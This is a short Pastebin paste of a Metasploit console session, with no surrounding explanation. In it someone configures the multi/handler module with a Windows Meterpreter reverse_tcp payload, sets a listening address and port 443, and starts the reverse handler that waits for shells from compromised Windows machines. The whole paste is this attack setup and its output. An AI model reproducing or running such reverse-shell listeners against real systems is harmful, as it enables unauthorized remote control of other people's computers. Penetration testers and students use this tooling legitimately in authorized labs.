Advertisement
Guest User

Untitled

a guest
Oct 21st, 2014
176
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.90 KB | None | 0 0
  1. msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
  2. PAYLOAD => windows/meterpreter/reverse_tcp
  3. msf exploit(handler) > set LHOST 192.168.18.78
  4. LHOST => 192.168.18.78
  5. msf exploit(handler) > show options
  6.  
  7. Module options (exploit/multi/handler):
  8.  
  9. Name Current Setting Required Description
  10. ---- --------------- -------- -----------
  11.  
  12.  
  13. Payload options (windows/meterpreter/reverse_tcp):
  14.  
  15. Name Current Setting Required Description
  16. ---- --------------- -------- -----------
  17. EXITFUNC process yes Exit technique: seh, thread, process, none
  18. LHOST 192.168.18.78 yes The listen address
  19. LPORT 443 yes The listen port
  20.  
  21.  
  22. Exploit target:
  23.  
  24. Id Name
  25. -- ----
  26. 0 Wildcard Target
  27.  
  28.  
  29. msf exploit(handler) > run
  30.  
  31. [*] Started reverse handler on 192.168.18.78:443
  32. [*] Starting the payload handler...
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement